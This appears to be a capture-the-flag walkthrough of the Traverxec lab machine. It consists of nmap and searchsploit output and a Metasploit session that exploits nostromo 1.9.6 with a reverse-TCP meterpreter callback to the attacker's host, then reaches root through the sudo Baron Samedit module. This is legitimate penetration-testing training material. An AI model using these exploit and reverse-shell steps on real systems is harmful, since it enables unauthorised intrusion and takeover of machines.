Traverxec

From RCATs
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-22 20:47 MST                                                                                                                                                                                
Nmap scan report for 10.129.28.145
Host is up (0.061s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa99a81668cd41ccf96c8401c759095c (RSA)
|   256 93dd1a23eed71f086b58470973a388cc (ECDSA)
|_  256 9dd6621e7afb8f5692e637f110db9bce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.76 seconds

Search to see if nostromo 1.9.6 has any exploits

❯ searchsploit nostromo
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                               |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                                                                                                         | multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                                                                                                                                       | multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                                                                                                         | linux/remote/35466.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Load found exploit up in metasploit

msf6 exploit(multi/http/nostromo_code_exec) > set payload payload/cmd/unix/python/meterpreter/reverse_tcp                                                                      │       valid_lft forever preferred_lft forever
payload => cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/python/meterpreter/reverse_tcp command payload
[*] Sending stage (24380 bytes) to 10.129.28.145
[*] Meterpreter session 2 opened (10.10.16.19:4444 -> 10.129.28.145:40198) at 2022-12-22 20:52:07 -0700

meterpreter > getuid                                       
Server username: www-data
meterpreter > background                                                                                                                                                                                                                       
[*] Backgrounding session 2...

Grab multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set session 2                                                                                                                                                                                 
session => 2                                                                                                                                                                                                                                   
msf6 post(multi/recon/local_exploit_suggester) > exploit  

 #   Name                                                                Potentially Vulnerable?  Check Result                                                                                                                                 
 -   ----                                                                -----------------------  ------------                                                                                                                                 
 1   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.                                                                                                         
 2   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.                                                                                                         
 3   exploit/linux/local/sudo_baron_samedit                              Yes                      The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.                                                                      
 4   exploit/linux/local/ubuntu_enlightenment_mount_priv_esc             Yes                      The target appears to be vulnerable.

sudo 1.8.27 looks like a good target.

msf6 exploit(linux/local/sudo_baron_samedit) > exploit                                                                                                                                                                                         

[!] SESSION may not be compatible with this module:                                                                    
[!]  * incompatible session architecture: python                                                                       
[*] Started reverse TCP handler on 10.10.16.19:4443                                                                    
[*] Running automatic check ("set AutoCheck false" to disable)                                                         
[+] The target appears to be vulnerable. sudo 1.8.27 is a vulnerable build.                                            
[*] Writing '/tmp/KpNJLxj9J.py' (763 bytes) ...                                                                        
[*] Writing '/tmp/libnss_UTY8j/N .so.2' (548 bytes) ...                                                                
[*] Sending stage (3045348 bytes) to 10.129.28.145                                                                     
[+] Deleted /tmp/KpNJLxj9J.py                              
[+] Deleted /tmp/libnss_UTY8j/N .so.2                      
[+] Deleted /tmp/libnss_UTY8j                              
[*] Meterpreter session 3 opened (10.10.16.19:4443 -> 10.129.28.145:47712) at 2022-12-22 21:06:24 -0700                                                                                                                                        

meterpreter > getuid                                       
Server username: root